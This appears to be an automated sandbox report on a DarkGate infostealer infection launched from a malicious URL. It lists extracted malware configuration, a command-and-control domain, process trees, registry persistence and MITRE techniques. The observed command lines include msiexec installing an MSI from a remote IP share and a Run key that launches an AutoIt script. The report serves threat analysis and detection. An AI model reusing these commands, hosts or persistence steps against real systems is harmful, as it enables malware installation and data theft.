darkgate | hxxp://wordonlinestorage[.]com

Analysis

max time kernel
1800s
max time network
1805s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
27/02/2024, 16:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://wordonlinestorage.com

Score

10^/10

darkgate admin888 discovery persistence stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

remasterprodelherskjs.com

Attributes

anti_analysis
false
anti_debug
false
anti_vm
false
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
kiQRLFmc
minimum_disk
50
minimum_ram
7000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 11 IoCs

resource	yara_rule
behavioral1/memory/1600-216-0x0000000005E20000-0x000000000616F000-memory.dmp	family_darkgate_v6
behavioral1/memory/432-227-0x0000000002630000-0x0000000002DD2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1600-232-0x0000000005E20000-0x000000000616F000-memory.dmp	family_darkgate_v6
behavioral1/memory/432-236-0x0000000002630000-0x0000000002DD2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1168-241-0x0000000002510000-0x0000000002CB2000-memory.dmp	family_darkgate_v6
behavioral1/memory/432-242-0x0000000002630000-0x0000000002DD2000-memory.dmp	family_darkgate_v6
behavioral1/memory/432-243-0x0000000002630000-0x0000000002DD2000-memory.dmp	family_darkgate_v6
behavioral1/memory/432-245-0x0000000002630000-0x0000000002DD2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1168-249-0x0000000002510000-0x0000000002CB2000-memory.dmp	family_darkgate_v6
behavioral1/memory/432-250-0x0000000002630000-0x0000000002DD2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1168-251-0x0000000002510000-0x0000000002CB2000-memory.dmp	family_darkgate_v6

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 1600 created 3824	1600	Autoit3.exe	105
PID 432 created 3676	432	GoogleUpdateCore.exe	46
PID 432 created 3676	432	GoogleUpdateCore.exe	46
PID 432 created 3036	432	GoogleUpdateCore.exe	49

Executes dropped EXE 2 IoCs

pid	Process
2720	iTunesHelper.exe
1600	Autoit3.exe

Loads dropped DLL 2 IoCs

pid	Process
2276	MsiExec.exe
2720	iTunesHelper.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2680	ICACLS.EXE
4840	ICACLS.EXE

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
3824	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\bhbHCDc = "C:\\ProgramData\\fgafcad\\Autoit3.exe C:\\ProgramData\\fgafcad\\hkafbhd.a3x"	GoogleUpdateCore.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File created	C:\Windows\SystemTemp\~DF056B0724DA827F0A.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF42CC6D97F31E86C1.TMP	msiexec.exe
File created	C:\Windows\Installer\SourceHash{3FEDD42F-832E-495B-A157-E5BB940CC16D}	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DF21CF1AB7DA971C22.TMP	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC41.tmp	msiexec.exe
File created	C:\Windows\Installer\e5b0849.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\e5b0849.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DFC915F854C5FA0A2F.TMP	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000004b52018b2f23ece20000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800004b52018b0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809004b52018b000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d4b52018b000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004b52018b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GoogleUpdateCore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GoogleUpdateCore.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GoogleUpdateCore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GoogleUpdateCore.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133535251363749336"	chrome.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1628	chrome.exe
1628	chrome.exe
2996	msiexec.exe
2996	msiexec.exe
1600	Autoit3.exe
1600	Autoit3.exe
1600	Autoit3.exe
1600	Autoit3.exe
432	GoogleUpdateCore.exe
432	GoogleUpdateCore.exe
432	GoogleUpdateCore.exe
432	GoogleUpdateCore.exe
432	GoogleUpdateCore.exe
432	GoogleUpdateCore.exe
432	GoogleUpdateCore.exe
432	GoogleUpdateCore.exe
1168	GoogleUpdateCore.exe
1168	GoogleUpdateCore.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
432	GoogleUpdateCore.exe
1168	GoogleUpdateCore.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	1628	chrome.exe
Token: SeCreatePagefilePrivilege	1628	chrome.exe
Token: SeShutdownPrivilege	3824	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3824	msiexec.exe
Token: SeSecurityPrivilege	2996	msiexec.exe
Token: SeCreateTokenPrivilege	3824	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3824	msiexec.exe
Token: SeLockMemoryPrivilege	3824	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3824	msiexec.exe
Token: SeMachineAccountPrivilege	3824	msiexec.exe
Token: SeTcbPrivilege	3824	msiexec.exe
Token: SeSecurityPrivilege	3824	msiexec.exe
Token: SeTakeOwnershipPrivilege	3824	msiexec.exe
Token: SeLoadDriverPrivilege	3824	msiexec.exe
Token: SeSystemProfilePrivilege	3824	msiexec.exe
Token: SeSystemtimePrivilege	3824	msiexec.exe
Token: SeProfSingleProcessPrivilege	3824	msiexec.exe
Token: SeIncBasePriorityPrivilege	3824	msiexec.exe
Token: SeCreatePagefilePrivilege	3824	msiexec.exe
Token: SeCreatePermanentPrivilege	3824	msiexec.exe
Token: SeBackupPrivilege	3824	msiexec.exe
Token: SeRestorePrivilege	3824	msiexec.exe
Token: SeShutdownPrivilege	3824	msiexec.exe
Token: SeDebugPrivilege	3824	msiexec.exe
Token: SeAuditPrivilege	3824	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3824	msiexec.exe
Token: SeChangeNotifyPrivilege	3824	msiexec.exe
Token: SeRemoteShutdownPrivilege	3824	msiexec.exe
Token: SeUndockPrivilege	3824	msiexec.exe
Token: SeSyncAgentPrivilege	3824	msiexec.exe
Token: SeEnableDelegationPrivilege	3824	msiexec.exe
Token: SeManageVolumePrivilege	3824	msiexec.exe
Token: SeImpersonatePrivilege	3824	msiexec.exe
Token: SeCreateGlobalPrivilege	3824	msiexec.exe
Token: SeBackupPrivilege	2836	vssvc.exe
Token: SeRestorePrivilege	2836	vssvc.exe
Token: SeAuditPrivilege	2836	vssvc.exe
Token: SeBackupPrivilege	2996	msiexec.exe
Token: SeRestorePrivilege	2996	msiexec.exe
Token: SeRestorePrivilege	2996	msiexec.exe
Token: SeTakeOwnershipPrivilege	2996	msiexec.exe
Token: SeRestorePrivilege	2996	msiexec.exe
Token: SeTakeOwnershipPrivilege	2996	msiexec.exe
Token: SeBackupPrivilege	3192	srtasks.exe

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
3824	msiexec.exe
3824	msiexec.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1628 wrote to memory of 836	1628	chrome.exe	43
PID 1628 wrote to memory of 836	1628	chrome.exe	43
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 2628	1628	chrome.exe	83
PID 1628 wrote to memory of 1832	1628	chrome.exe	84
PID 1628 wrote to memory of 1832	1628	chrome.exe	84
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85
PID 1628 wrote to memory of 1232	1628	chrome.exe	85

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://wordonlinestorage.com
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffe7a59758,0x7fffe7a59768,0x7fffe7a59778
  2⤵
  PID:836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:2
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:8
  2⤵
  PID:1832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:8
  2⤵
  PID:1232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:1
  2⤵
  PID:2748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:1
  2⤵
  PID:2556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3788 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:8
  2⤵
  PID:796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3308 --field-trial-handle=1872,i,8506617593503682746,18039690882646406572,131072 /prefetch:8
  2⤵
  PID:1088

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
PID:3676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3036
- C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
  "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  PID:1168

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:1724

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1564

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" \\147.45.197.186\share\dark.vbs
1⤵
PID:1976

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "\\147.45.197.186\share\scan.msi"
1⤵
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3824
- C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
  "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  PID:432

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3192
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 456212F71EA4632926A9D5CE0522ECE6
  2⤵
  - Loads dropped DLL
  PID:2276
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    PID:2680
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    PID:4464
- - C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\iTunesHelper.exe
    "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\iTunesHelper.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2720
  - - \??\c:\temp\Autoit3.exe
      "c:\temp\Autoit3.exe" c:\temp\script.a3x
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files"
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\." /SETINTEGRITYLEVEL (CI)(OI)LOW
    3⤵
    - Modifies file permissions
    PID:4840

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\fgafcad\hhehhgk

Filesize
1KB

MD5
2ddafd05722be6d7cd6cc73b5b98142a

SHA1
2c18d7c72f940140c1155e5a3da2d3443dadd5a1

SHA256
89b10fd9514d79cf3bbb2bad41cc9fc76ca78f21310d9b906c80a5c8fd5b9215

SHA512
